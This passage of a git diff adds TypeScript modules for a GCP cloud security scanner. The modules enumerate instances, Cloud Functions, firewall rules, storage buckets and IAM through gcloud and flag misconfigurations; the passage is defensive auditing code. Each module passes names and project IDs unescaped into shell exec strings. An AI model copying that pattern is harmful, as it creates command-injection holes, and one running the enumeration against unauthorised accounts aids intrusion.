+      result.findings.push(`GCP compute enumeration error: ${String(err)}`)
+    }
+
+    return result
+  }
+
+  /**
+   * Get instances with public IPs.
+   */
+  export async function getPublicInstances(
+    options: GCPComputeOptions = {}
+  ): Promise<CloudScanTypes.ComputeInstance[]> {
+    const { instances } = await enumerate("check", options)
+    return instances.filter((i) => i.publiclyAccessible && i.state === "running")
+  }
+
+  /**
+   * Get instances with default service account.
+   */
+  export async function getInstancesWithDefaultSA(
+    options: GCPComputeOptions = {}
+  ): Promise<CloudScanTypes.ComputeInstance[]> {
+    const projectId = options.projectId || await getDefaultProject()
+    const { instances } = await enumerate("check", options)
+
+    const defaultSAPattern = `-compute@developer.gserviceaccount.com`
+
+    return instances.filter((i) => i.iamRole?.includes(defaultSAPattern))
+  }
+
+  /**
+   * Get publicly invocable Cloud Functions.
+   */
+  export async function getPublicFunctions(
+    options: GCPComputeOptions = {}
+  ): Promise<CloudScanTypes.ServerlessFunction[]> {
+    const { functions } = await enumerate("check", options)
+    return functions.filter((f) => f.publiclyAccessible)
+  }
+
+  /**
+   * Get Cloud Functions without VPC connector.
+   */
+  export async function getFunctionsWithoutVPC(
+    options: GCPComputeOptions = {}
+  ): Promise<CloudScanTypes.ServerlessFunction[]> {
+    const { functions } = await enumerate("check", options)
+    return functions.filter((f) => !f.vpcConfig)
+  }
+
+  /**
+   * Check instance metadata configuration.
+   */
+  export async function checkInstanceMetadata(
+    instanceName: string,
+    zone: string,
+    options: GCPComputeOptions = {}
+  ): Promise<{
+    projectSshKeys: boolean
+    serialPortEnabled: boolean
+    osLogin: boolean
+  }> {
+    const projectFlag = options.projectId ? `--project ${options.projectId}` : ""
+
+    try {
+      const output = await runGCloudCommand(
+        `gcloud compute instances describe ${instanceName} --zone ${zone} ${projectFlag} --format json`,
+        options.timeout
+      )
+
+      if (!output) {
+        return { projectSshKeys: true, serialPortEnabled: false, osLogin: false }
+      }
+
+      const data = JSON.parse(output)
+      const metadata = data.metadata?.items || []
+
+      const getMetadataValue = (key: string): string | undefined => {
+        const item = metadata.find((m: any) => m.key === key)
+        return item?.value
+      }
+
+      return {
+        projectSshKeys: getMetadataValue("block-project-ssh-keys") !== "true",
+        serialPortEnabled: getMetadataValue("serial-port-enable") === "true",
+        osLogin: getMetadataValue("enable-oslogin") === "TRUE",
+      }
+    } catch (err) {
+      log.debug("Failed to check instance metadata", { instance: instanceName, error: String(err) })
+      return { projectSshKeys: true, serialPortEnabled: false, osLogin: false }
+    }
+  }
+
+  // ========== Helper Functions ==========
+
+  async function runGCloudCommand(command: string, _timeout?: number): Promise<string | null> {
+    try {
+      const { stdout } = await execAsync(command)
+      return stdout.trim()
+    } catch (err) {
+      log.debug("GCloud command failed", { command, error: String(err) })
+      return null
+    }
+  }
+
+  async function getDefaultProject(): Promise<string> {
+    try {
+      const output = await runGCloudCommand("gcloud config get-value project", 10000)
+      return output || ""
+    } catch {
+      return ""
+    }
+  }
+
+  async function enrichFunctionDetails(
+    fn: CloudScanTypes.ServerlessFunction,
+    projectFlag: string,
+    timeout?: number
+  ): Promise<void> {
+    try {
+      // Check IAM policy for public access
+      const policyOutput = await runGCloudCommand(
+        `gcloud functions get-iam-policy ${fn.name} --region ${fn.region} ${projectFlag} --format json`,
+        timeout
+      )
+
+      if (policyOutput) {
+        const policy = JSON.parse(policyOutput)
+        const bindings = policy.bindings || []
+
+        for (const binding of bindings) {
+          if (binding.role === "roles/cloudfunctions.invoker") {
+            if (binding.members?.includes("allUsers")) {
+              fn.publiclyAccessible = true
+            } else if (binding.members?.includes("allAuthenticatedUsers")) {
+              fn.publiclyAccessible = true
+            }
+          }
+        }
+      }
+    } catch (err) {
+      log.debug("Failed to enrich function details", { function: fn.name, error: String(err) })
+    }
+  }
+
+  function analyzeComputeSecurity(
+    scanID: string,
+    result: GCPComputeResult
+  ): CloudScanTypes.CloudFinding[] {
+    const findings: CloudScanTypes.CloudFinding[] = []
+
+    // Check instances
+    for (const instance of result.instances) {
+      if (instance.state !== "running") continue
+
+      // Public instance
+      if (instance.publiclyAccessible) {
+        findings.push(createInstanceFinding(
+          scanID,
+          "medium",
+          "GCE Instance Has Public IP",
+          `Instance ${instance.name} has a public IP address (${instance.publicIp}).`,
+          instance
+        ))
+      }
+
+      // Default service account
+      if (instance.iamRole?.includes("-compute@developer.gserviceaccount.com")) {
+        findings.push(createInstanceFinding(
+          scanID,
+          "medium",
+          "GCE Instance Uses Default Service Account",
+          `Instance ${instance.name} uses the default Compute Engine service account. Consider using a custom service account with minimal permissions.`,
+          instance
+        ))
+      }
+    }
+
+    // Check functions
+    for (const fn of result.functions) {
+      // Public function
+      if (fn.publiclyAccessible) {
+        findings.push(createFunctionFinding(
+          scanID,
+          "high",
+          "Cloud Function Publicly Invocable",
+          `Cloud Function ${fn.name} can be invoked by anyone (allUsers or allAuthenticatedUsers).`,
+          fn
+        ))
+      }
+
+      // Secrets in env vars
+      if (fn.envVarsWithSecrets.length > 0) {
+        findings.push(createFunctionFinding(
+          scanID,
+          "high",
+          "Cloud Function Has Secrets in Environment Variables",
+          `Cloud Function ${fn.name} has potential secrets in environment variables: ${fn.envVarsWithSecrets.join(", ")}. Use Secret Manager instead.`,
+          fn
+        ))
+      }
+
+      // No VPC connector
+      if (!fn.vpcConfig) {
+        findings.push(createFunctionFinding(
+          scanID,
+          "info",
+          "Cloud Function Without VPC Connector",
+          `Cloud Function ${fn.name} is not connected to a VPC.`,
+          fn
+        ))
+      }
+    }
+
+    return findings
+  }
+
+  function createInstanceFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    instance: CloudScanTypes.ComputeInstance
+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `gcp_gce_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "gcp",
+      region: instance.region,
+      severity,
+      title,
+      description,
+      resourceType: "instance",
+      resourceId: instance.id,
+      category: "compute",
+      complianceFrameworks: ["cis", "gcp-security-foundations"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "gcp",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "compute",
+      resourceType: "instance",
+      resourceId: instance.id,
+    })
+
+    return finding
+  }
+
+  function createFunctionFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    fn: CloudScanTypes.ServerlessFunction
+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `gcp_cf_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "gcp",
+      region: fn.region,
+      severity,
+      title,
+      description,
+      resourceType: "function",
+      resourceId: fn.id,
+      category: "compute",
+      complianceFrameworks: ["cis", "gcp-security-foundations"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "gcp",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "compute",
+      resourceType: "function",
+      resourceId: fn.id,
+    })
+
+    return finding
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/gcp/firewall.ts b/packages/opencode/src/pentest/cloudscan/gcp/firewall.ts
new file mode 100644
index 00000000000..f3fa3a21807
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/gcp/firewall.ts
@@ -0,0 +1,386 @@
+/**
+ * @fileoverview GCP Firewall Analysis
+ *
+ * GCP firewall rules enumeration and security analysis.
+ *
+ * @module pentest/cloudscan/gcp/firewall
+ */
+
+import { CloudScanTypes } from "../types"
+import { CloudScanEvents } from "../events"
+import { GCloudParser } from "../parsers/gcloud"
+import { Bus } from "../../../bus"
+import { Log } from "../../../util/log"
+import { exec } from "child_process"
+import { promisify } from "util"
+
+const execAsync = promisify(exec)
+
+const log = Log.create({ service: "cloudscan.gcp.firewall" })
+
+/**
+ * GCP Firewall options.
+ */
+export interface GCPFirewallOptions {
+  projectId?: string
+  timeout?: number
+}
+
+/**
+ * GCP Firewall result.
+ */
+export interface GCPFirewallResult {
+  firewallRules: CloudScanTypes.SecurityGroup[]
+  vpcs: CloudScanTypes.VirtualNetwork[]
+  findings: string[]
+  issues: CloudScanTypes.CloudFinding[]
+}
+
+/**
+ * GCP Firewall namespace.
+ */
+export namespace GCPFirewall {
+  /**
+   * Enumerate all firewall rules and VPCs.
+   */
+  export async function enumerate(
+    scanID: string,
+    options: GCPFirewallOptions = {}
+  ): Promise<GCPFirewallResult> {
+    const result: GCPFirewallResult = {
+      firewallRules: [],
+      vpcs: [],
+      findings: [],
+      issues: [],
+    }
+
+    const projectFlag = options.projectId ? `--project ${options.projectId}` : ""
+
+    try {
+      // Enumerate firewall rules
+      log.info("Enumerating GCP firewall rules")
+      const fwOutput = await runGCloudCommand(
+        `gcloud compute firewall-rules list ${projectFlag} --format json`,
+        options.timeout
+      )
+
+      if (fwOutput) {
+        result.firewallRules = GCloudParser.parseFirewallRules(fwOutput)
+        result.findings.push(`Found ${result.firewallRules.length} firewall rule groups`)
+
+        for (const sg of result.firewallRules) {
+          // Analyze rules
+          analyzeFirewallRules(sg)
+
+          Bus.publish(CloudScanEvents.SecurityGroupFound, {
+            scanID,
+            provider: "gcp",
+            groupId: sg.id,
+            groupName: sg.name,
+            vpcId: sg.vpcId,
+            ruleCount: sg.rules.length,
+            hasPublicIngress: sg.hasPublicIngress,
+          })
+
+          // Emit events for insecure rules
+          for (const rule of sg.rules) {
+            if (rule.issues.length > 0) {
+              const portStr = rule.portRange
+                ? rule.portRange.from === rule.portRange.to
+                  ? rule.portRange.from.toString()
+                  : `${rule.portRange.from}-${rule.portRange.to}`
+                : "all"
+
+              for (const issue of rule.issues) {
+                Bus.publish(CloudScanEvents.InsecureRuleFound, {
+                  scanID,
+                  provider: "gcp",
+                  groupId: sg.id,
+                  groupName: sg.name,
+                  direction: rule.direction,
+                  protocol: rule.protocol,
+                  port: portStr,
+                  source: rule.source,
+                  issue,
+                })
+              }
+            }
+          }
+        }
+      }
+
+      // Enumerate VPCs
+      log.info("Enumerating GCP VPC networks")
+      const vpcOutput = await runGCloudCommand(
+        `gcloud compute networks list ${projectFlag} --format json`,
+        options.timeout
+      )
+
+      if (vpcOutput) {
+        result.vpcs = GCloudParser.parseVPCNetworks(vpcOutput)
+
+        // Enrich with subnet details
+        const subnetOutput = await runGCloudCommand(
+          `gcloud compute networks subnets list ${projectFlag} --format json`,
+          options.timeout
+        )
+
+        if (subnetOutput) {
+          const subnets = GCloudParser.parseSubnets(subnetOutput)
+
+          for (const vpc of result.vpcs) {
+            const vpcSubnets = subnets.filter((s) => s.network === vpc.name)
+            vpc.subnets = vpcSubnets.map((s) => s.name)
+            vpc.flowLogsEnabled = vpcSubnets.every((s) => s.flowLogsEnabled)
+          }
+        }
+
+        result.findings.push(`Found ${result.vpcs.length} VPC networks`)
+      }
+
+      // Analyze for security issues
+      result.issues = analyzeFirewallSecurity(scanID, result)
+
+    } catch (err) {
+      log.error("GCP firewall enumeration failed", { error: String(err) })
+      result.findings.push(`GCP firewall enumeration error: ${String(err)}`)
+    }
+
+    return result
+  }
+
+  /**
+   * Get firewall rules with public ingress.
+   */
+  export async function getRulesWithPublicIngress(
+    options: GCPFirewallOptions = {}
+  ): Promise<CloudScanTypes.SecurityGroup[]> {
+    const { firewallRules } = await enumerate("check", options)
+    return firewallRules.filter((fw) => fw.hasPublicIngress)
+  }
+
+  /**
+   * Get firewall rules allowing specific port from internet.
+   */
+  export async function getRulesAllowingPort(
+    port: number,
+    options: GCPFirewallOptions = {}
+  ): Promise<CloudScanTypes.SecurityGroup[]> {
+    const { firewallRules } = await enumerate("check", options)
+
+    return firewallRules.filter((fw) =>
+      fw.rules.some(
+        (rule) =>
+          rule.direction === "inbound" &&
+          rule.isPublic &&
+          rule.portRange &&
+          port >= rule.portRange.from &&
+          port <= rule.portRange.to
+      )
+    )
+  }
+
+  /**
+   * Get VPCs without flow logs enabled.
+   */
+  export async function getVPCsWithoutFlowLogs(
+    options: GCPFirewallOptions = {}
+  ): Promise<CloudScanTypes.VirtualNetwork[]> {
+    const { vpcs } = await enumerate("check", options)
+    return vpcs.filter((v) => !v.flowLogsEnabled)
+  }
+
+  /**
+   * Get default network.
+   */
+  export async function getDefaultNetwork(
+    options: GCPFirewallOptions = {}
+  ): Promise<CloudScanTypes.VirtualNetwork | null> {
+    const { vpcs } = await enumerate("check", options)
+    return vpcs.find((v) => v.isDefault) || null
+  }
+
+  // ========== Helper Functions ==========
+
+  async function runGCloudCommand(command: string, _timeout?: number): Promise<string | null> {
+    try {
+      const { stdout } = await execAsync(command)
+      return stdout.trim()
+    } catch (err) {
+      log.debug("GCloud command failed", { command, error: String(err) })
+      return null
+    }
+  }
+
+  function analyzeFirewallRules(sg: CloudScanTypes.SecurityGroup): void {
+    for (const rule of sg.rules) {
+      if (rule.direction !== "inbound") continue
+      if (!rule.isPublic) continue
+
+      // Check for unrestricted access (all ports)
+      if (!rule.portRange && rule.protocol !== "icmp") {
+        rule.issues.push("Allows ALL traffic from public internet")
+      }
+
+      // Check for sensitive ports
+      if (rule.portRange) {
+        for (const [port, serviceName] of Object.entries(CloudScanTypes.SENSITIVE_PORTS)) {
+          const portNum = parseInt(port, 10)
+          if (portNum >= rule.portRange.from && portNum <= rule.portRange.to) {
+            rule.issues.push(`Exposes ${serviceName} (port ${portNum}) to public internet`)
+          }
+        }
+      }
+    }
+  }
+
+  function analyzeFirewallSecurity(
+    scanID: string,
+    result: GCPFirewallResult
+  ): CloudScanTypes.CloudFinding[] {
+    const findings: CloudScanTypes.CloudFinding[] = []
+
+    for (const fw of result.firewallRules) {
+      // Unrestricted access
+      if (fw.hasUnrestrictedIngress) {
+        findings.push(createFirewallFinding(
+          scanID,
+          "critical",
+          "Firewall Allows Unrestricted Access",
+          `Firewall rules for network ${fw.name} allow unrestricted inbound access from the internet (0.0.0.0/0 on all ports).`,
+          fw
+        ))
+      }
+
+      // Check for specific sensitive ports
+      const sensitivePortsExposed = new Set<string>()
+
+      for (const rule of fw.rules) {
+        if (rule.direction !== "inbound" || !rule.isPublic) continue
+
+        for (const issue of rule.issues) {
+          if (issue.includes("Exposes")) {
+            const match = issue.match(/Exposes (\w+)/)
+            if (match) sensitivePortsExposed.add(match[1])
+          }
+        }
+      }
+
+      for (const service of sensitivePortsExposed) {
+        let severity: CloudScanTypes.Severity = "medium"
+        if (["SSH", "RDP", "Telnet", "SMB"].includes(service)) {
+          severity = "high"
+        } else if (["MySQL", "PostgreSQL", "MSSQL", "MongoDB", "Redis"].includes(service)) {
+          severity = "critical"
+        }
+
+        findings.push(createFirewallFinding(
+          scanID,
+          severity,
+          `${service} Exposed to Internet`,
+          `Firewall rules for network ${fw.name} expose ${service} to the public internet.`,
+          fw
+        ))
+      }
+    }
+
+    // Check VPCs
+    for (const vpc of result.vpcs) {
+      // VPC without flow logs
+      if (!vpc.flowLogsEnabled) {
+        findings.push(createVPCFinding(
+          scanID,
+          "medium",
+          "VPC Network Without Flow Logs",
+          `VPC network ${vpc.name} does not have flow logs enabled on all subnets.`,
+          vpc
+        ))
+      }
+
+      // Default network exists
+      if (vpc.isDefault) {
+        findings.push(createVPCFinding(
+          scanID,
+          "low",
+          "Default Network Exists",
+          `Default VPC network exists. Consider deleting the default network and creating custom networks.`,
+          vpc
+        ))
+      }
+    }
+
+    return findings
+  }
+
+  function createFirewallFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    fw: CloudScanTypes.SecurityGroup
+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `gcp_fw_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "gcp",
+      severity,
+      title,
+      description,
+      resourceType: "firewall-rule",
+      resourceId: fw.id,
+      category: "network",
+      complianceFrameworks: ["cis", "gcp-security-foundations"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "gcp",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "network",
+      resourceType: "firewall-rule",
+      resourceId: fw.id,
+    })
+
+    return finding
+  }
+
+  function createVPCFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    vpc: CloudScanTypes.VirtualNetwork
+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `gcp_vpc_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "gcp",
+      severity,
+      title,
+      description,
+      resourceType: "vpc",
+      resourceId: vpc.id,
+      category: "network",
+      complianceFrameworks: ["cis", "gcp-security-foundations"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "gcp",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "network",
+      resourceType: "vpc",
+      resourceId: vpc.id,
+    })
+
+    return finding
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/gcp/gcs.ts b/packages/opencode/src/pentest/cloudscan/gcp/gcs.ts
new file mode 100644
index 00000000000..0b9aed258fa
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/gcp/gcs.ts
@@ -0,0 +1,356 @@
+/**
+ * @fileoverview GCP Cloud Storage Security Analysis
+ *
+ * GCS bucket enumeration and security analysis.
+ *
+ * @module pentest/cloudscan/gcp/gcs
+ */
+
+import { CloudScanTypes } from "../types"
+import { CloudScanEvents } from "../events"
+import { GCloudParser } from "../parsers/gcloud"
+import { Bus } from "../../../bus"
+import { Log } from "../../../util/log"
+import { exec } from "child_process"
+import { promisify } from "util"
+
+const execAsync = promisify(exec)
+
+const log = Log.create({ service: "cloudscan.gcp.gcs" })
+
+/**
+ * GCP GCS options.
+ */
+export interface GCPGCSOptions {
+  projectId?: string
+  timeout?: number
+}
+
+/**
+ * GCP GCS result.
+ */
+export interface GCPGCSResult {
+  buckets: CloudScanTypes.StorageBucket[]
+  findings: string[]
+  issues: CloudScanTypes.CloudFinding[]
+}
+
+/**
+ * GCP GCS namespace.
+ */
+export namespace GCPGCS {
+  /**
+   * Enumerate all GCS buckets and their security settings.
+   */
+  export async function enumerate(
+    scanID: string,
+    options: GCPGCSOptions = {}
+  ): Promise<GCPGCSResult> {
+    const result: GCPGCSResult = {
+      buckets: [],
+      findings: [],
+      issues: [],
+    }
+
+    const projectFlag = options.projectId ? `--project ${options.projectId}` : ""
+
+    try {
+      log.info("Enumerating GCS buckets")
+      const output = await runGCloudCommand(
+        `gcloud storage buckets list ${projectFlag} --format json`,
+        options.timeout
+      )
+
+      if (!output) {
+        result.findings.push("Failed to list GCS buckets")
+        return result
+      }
+
+      const partialBuckets = GCloudParser.parseBuckets(output)
+      result.findings.push(`Found ${partialBuckets.length} GCS buckets`)
+
+      // Enrich each bucket
+      for (const partial of partialBuckets) {
+        const bucket = await enrichBucketDetails(partial, options)
+        result.buckets.push(bucket as CloudScanTypes.StorageBucket)
+
+        Bus.publish(CloudScanEvents.BucketFound, {
+          scanID,
+          provider: "gcp",
+          bucketName: bucket.name!,
+          region: bucket.region,
+          isPublic: !bucket.publicAccessBlocked,
+          hasEncryption: bucket.encryption?.enabled || true, // GCS always encrypts
+          hasVersioning: bucket.versioningEnabled || false,
+        })
+
+        // Check for public access
+        if (!bucket.publicAccessBlocked) {
+          Bus.publish(CloudScanEvents.PublicBucketFound, {
+            scanID,
+            provider: "gcp",
+            bucketName: bucket.name!,
+            accessLevel: bucket.accessLevel || "public-read",
+            reason: "Public access prevention not enforced",
+          })
+        }
+      }
+
+      // Analyze for security issues
+      result.issues = analyzeGCSSecurity(scanID, result.buckets)
+
+    } catch (err) {
+      log.error("GCS enumeration failed", { error: String(err) })
+      result.findings.push(`GCS enumeration error: ${String(err)}`)
+    }
+
+    return result
+  }
+
+  /**
+   * Get buckets with public access.
+   */
+  export async function getPublicBuckets(
+    options: GCPGCSOptions = {}
+  ): Promise<CloudScanTypes.StorageBucket[]> {
+    const { buckets } = await enumerate("check", options)
+    return buckets.filter((b) => !b.publicAccessBlocked)
+  }
+
+  /**
+   * Get buckets without uniform bucket-level access.
+   */
+  export async function getBucketsWithoutUniformAccess(
+    options: GCPGCSOptions = {}
+  ): Promise<CloudScanTypes.StorageBucket[]> {
+    const { buckets } = await enumerate("check", options)
+    return buckets.filter((b) => b.aclEnabled)
+  }
+
+  /**
+   * Get buckets without versioning.
+   */
+  export async function getBucketsWithoutVersioning(
+    options: GCPGCSOptions = {}
+  ): Promise<CloudScanTypes.StorageBucket[]> {
+    const { buckets } = await enumerate("check", options)
+    return buckets.filter((b) => !b.versioningEnabled)
+  }
+
+  /**
+   * Check bucket IAM policy for public access.
+   */
+  export async function checkBucketPublicAccess(
+    bucketName: string,
+    options: GCPGCSOptions = {}
+  ): Promise<{
+    isPublic: boolean
+    publicMembers: string[]
+    bindings: Array<{ role: string; members: string[] }>
+  }> {
+    try {
+      const output = await runGCloudCommand(
+        `gcloud storage buckets get-iam-policy gs://${bucketName} --format json`,
+        options.timeout
+      )
+
+      if (!output) {
+        return { isPublic: false, publicMembers: [], bindings: [] }
+      }
+
+      const result = GCloudParser.parseBucketIAMPolicy(output)
+      const publicMembers: string[] = []
+
+      for (const binding of result.bindings) {
+        for (const member of binding.members) {
+          if (member === "allUsers" || member === "allAuthenticatedUsers") {
+            publicMembers.push(`${member} has ${binding.role}`)
+          }
+        }
+      }
+
+      return {
+        isPublic: result.isPublic,
+        publicMembers,
+        bindings: result.bindings,
+      }
+    } catch (err) {
+      log.debug("Failed to check bucket IAM policy", { bucket: bucketName, error: String(err) })
+      return { isPublic: false, publicMembers: [], bindings: [] }
+    }
+  }
+
+  // ========== Helper Functions ==========
+
+  async function runGCloudCommand(command: string, _timeout?: number): Promise<string | null> {
+    try {
+      const { stdout } = await execAsync(command)
+      return stdout.trim()
+    } catch (err) {
+      log.debug("GCloud command failed", { command, error: String(err) })
+      return null
+    }
+  }
+
+  async function enrichBucketDetails(
+    partial: Partial<CloudScanTypes.StorageBucket>,
+    options: GCPGCSOptions
+  ): Promise<Partial<CloudScanTypes.StorageBucket>> {
+    const bucket = { ...partial }
+
+    try {
+      // Get detailed bucket info
+      const detailOutput = await runGCloudCommand(
+        `gcloud storage buckets describe gs://${partial.name} --format json`,
+        options.timeout
+      )
+
+      if (detailOutput) {
+        const data = JSON.parse(detailOutput)
+
+        // Check public access prevention
+        bucket.publicAccessBlocked = data.iamConfiguration?.publicAccessPrevention === "enforced"
+
+        // Check uniform bucket-level access
+        bucket.aclEnabled = !data.iamConfiguration?.uniformBucketLevelAccess?.enabled
+
+        // Check versioning
+        bucket.versioningEnabled = data.versioning?.enabled ?? false
+
+        // Check logging
+        bucket.loggingEnabled = !!data.logging?.logBucket
+
+        // Check encryption
+        if (data.encryption?.defaultKmsKeyName) {
+          bucket.encryption = {
+            enabled: true,
+            keyId: data.encryption.defaultKmsKeyName,
+            customerManaged: true,
+          }
+        } else {
+          bucket.encryption = {
+            enabled: true, // GCS always encrypts
+            customerManaged: false,
+          }
+        }
+      }
+
+      // Check IAM policy for public access
+      const publicAccess = await checkBucketPublicAccess(partial.name!, options)
+      if (publicAccess.isPublic) {
+        bucket.hasPolicyPublicAccess = true
+        bucket.publicAccessBlocked = false
+        bucket.accessLevel = "public-read"
+        bucket.issues = bucket.issues || []
+        bucket.issues.push(...publicAccess.publicMembers)
+      }
+    } catch (err) {
+      log.debug("Failed to enrich bucket details", { bucket: partial.name, error: String(err) })
+    }
+
+    return bucket
+  }
+
+  function analyzeGCSSecurity(
+    scanID: string,
+    buckets: CloudScanTypes.StorageBucket[]
+  ): CloudScanTypes.CloudFinding[] {
+    const findings: CloudScanTypes.CloudFinding[] = []
+
+    for (const bucket of buckets) {
+      // Public access not prevented
+      if (!bucket.publicAccessBlocked) {
+        findings.push(createFinding(
+          scanID,
+          "high",
+          "GCS Bucket Public Access Prevention Not Enforced",
+          `Bucket ${bucket.name} does not enforce public access prevention.${bucket.issues?.length ? " " + bucket.issues.join(". ") : ""}`,
+          bucket
+        ))
+      }
+
+      // ACLs enabled (not uniform bucket-level access)
+      if (bucket.aclEnabled) {
+        findings.push(createFinding(
+          scanID,
+          "medium",
+          "GCS Bucket Uses ACLs Instead of Uniform Access",
+          `Bucket ${bucket.name} uses ACLs instead of uniform bucket-level access. This makes permissions harder to manage consistently.`,
+          bucket
+        ))
+      }
+
+      // No versioning
+      if (!bucket.versioningEnabled) {
+        findings.push(createFinding(
+          scanID,
+          "low",
+          "GCS Bucket Without Versioning",
+          `Bucket ${bucket.name} does not have object versioning enabled.`,
+          bucket
+        ))
+      }
+
+      // No logging
+      if (!bucket.loggingEnabled) {
+        findings.push(createFinding(
+          scanID,
+          "low",
+          "GCS Bucket Without Access Logging",
+          `Bucket ${bucket.name} does not have access logging enabled.`,
+          bucket
+        ))
+      }
+
+      // Not using CMEK
+      if (!bucket.encryption?.customerManaged) {
+        findings.push(createFinding(
+          scanID,
+          "info",
+          "GCS Bucket Using Google-Managed Encryption",
+          `Bucket ${bucket.name} uses Google-managed encryption keys. Consider using customer-managed encryption keys (CMEK) for sensitive data.`,
+          bucket
+        ))
+      }
+    }
+
+    return findings
+  }
+
+  function createFinding(
+    scanID: string,
+    severity: CloudScanTypes.Severity,
+    title: string,
+    description: string,
+    bucket: CloudScanTypes.StorageBucket
+  ): CloudScanTypes.CloudFinding {
+    const finding: CloudScanTypes.CloudFinding = {
+      id: `gcp_gcs_${Date.now()}_${Math.random().toString(36).slice(2, 8)}`,
+      provider: "gcp",
+      region: bucket.region,
+      severity,
+      title,
+      description,
+      resourceType: "bucket",
+      resourceId: bucket.id,
+      category: "storage",
+      complianceFrameworks: ["cis", "gcp-security-foundations"],
+      references: [],
+      foundAt: Date.now(),
+      source: "scanner",
+    }
+
+    Bus.publish(CloudScanEvents.FindingDetected, {
+      scanID,
+      provider: "gcp",
+      findingId: finding.id,
+      title,
+      severity,
+      category: "storage",
+      resourceType: "bucket",
+      resourceId: bucket.id,
+    })
+
+    return finding
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/gcp/iam.ts b/packages/opencode/src/pentest/cloudscan/gcp/iam.ts
new file mode 100644
index 00000000000..775e7f34df0
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/gcp/iam.ts
@@ -0,0 +1,383 @@
+/**
+ * @fileoverview GCP IAM Analysis
+ *
+ * GCP IAM enumeration and security analysis.
+ *
+ * @module pentest/cloudscan/gcp/iam
+ */
+
+import { CloudScanTypes } from "../types"
+import { CloudScanEvents } from "../events"
+import { GCloudParser } from "../parsers/gcloud"
+import { Bus } from "../../../bus"
+import { Log } from "../../../util/log"
+import { exec } from "child_process"
+import { promisify } from "util"
+
+const execAsync = promisify(exec)
+
+const log = Log.create({ service: "cloudscan.gcp.iam" })
+
+/**
+ * GCP IAM options.
+ */
+export interface GCPIAMOptions {
+  projectId?: string
+  timeout?: number
+}
+
+/**
+ * GCP IAM result.
+ */
+export interface GCPIAMResult {
+  serviceAccounts: CloudScanTypes.IAMPrincipal[]
+  customRoles: CloudScanTypes.IAMRole[]
+  iamBindings: Array<{ role: string; members: string[] }>
+  findings: string[]
+  issues: CloudScanTypes.CloudFinding[]
+}
+
+/**
+ * GCP IAM namespace.
+ */
+export namespace GCPIAM {
+  /**
+   * Enumerate all IAM resources.
+   */
+  export async function enumerate(
+    scanID: string,
+    options: GCPIAMOptions = {}
+  ): Promise<GCPIAMResult> {
+    const result: GCPIAMResult = {
+      serviceAccounts: [],
+      customRoles: [],
+      iamBindings: [],
+      findings: [],
+      issues: [],
+    }
+
+    const projectFlag = options.projectId ? `--project ${options.projectId}` : ""
+
+    try {
+      // Enumerate service accounts
+      log.info("Enumerating GCP service accounts")
+      const saOutput = await runGCloudCommand(
+        `gcloud iam service-accounts list ${projectFlag} --format json`,
+        options.timeout
+      )
+
+      if (saOutput) {
+        result.serviceAccounts = GCloudParser.parseServiceAccounts(saOutput)
+
+        // Enrich with key information
+        for (const sa of result.serviceAccounts) {
+          await enrichServiceAccountKeys(sa, projectFlag, options.timeout)
+
+          Bus.publish(CloudScanEvents.IAMUserFound, {
+            scanID,
+            provider: "gcp",
+            userName: sa.name,
+            userId: sa.id,
+            mfaEnabled: false, // GCP uses different auth
+            accessKeyCount: sa.accessKeys.length,
+            hasConsoleAccess: false,
+          })
+        }
+
+        result.findings.push(`Found ${result.serviceAccounts.length} service accounts`)
+      }
+
+      // Enumerate custom roles
+      log.info("Enumerating GCP custom roles")
+      const rolesOutput = await runGCloudCommand(
+        `gcloud iam roles list ${projectFlag} --format json`,
+        options.timeout
+      )
+
+      if (rolesOutput) {
+        result.customRoles = GCloudParser.parseCustomRoles(rolesOutput)
+
+        for (const role of result.customRoles) {
+          Bus.publish(CloudScanEvents.IAMRoleFound, {
+            scanID,
+            provider: "gcp",
+            roleName: role.name,
+            roleArn: role.id,
+            trustedEntities: 0,
+            isServiceLinked: role.isServiceLinked,
+          })
+        }
+
+        result.findings.push(`Found ${result.customRoles.length} custom roles`)
+      }
+
+      // Get IAM policy
+      log.info("Getting GCP IAM policy")
+      const policyOutput = await runGCloudCommand(
+        `gcloud projects get-iam-policy ${options.projectId || "$(gcloud config get-value project)"} --format json`,
+        options.timeout
+      )
+
+      if (policyOutput) {
+        result.iamBindings = GCloudParser.parseIAMPolicy(policyOutput)
+        result.findings.push(`Found ${result.iamBindings.length} IAM bindings`)
+      }
+
+      // Analyze for security issues
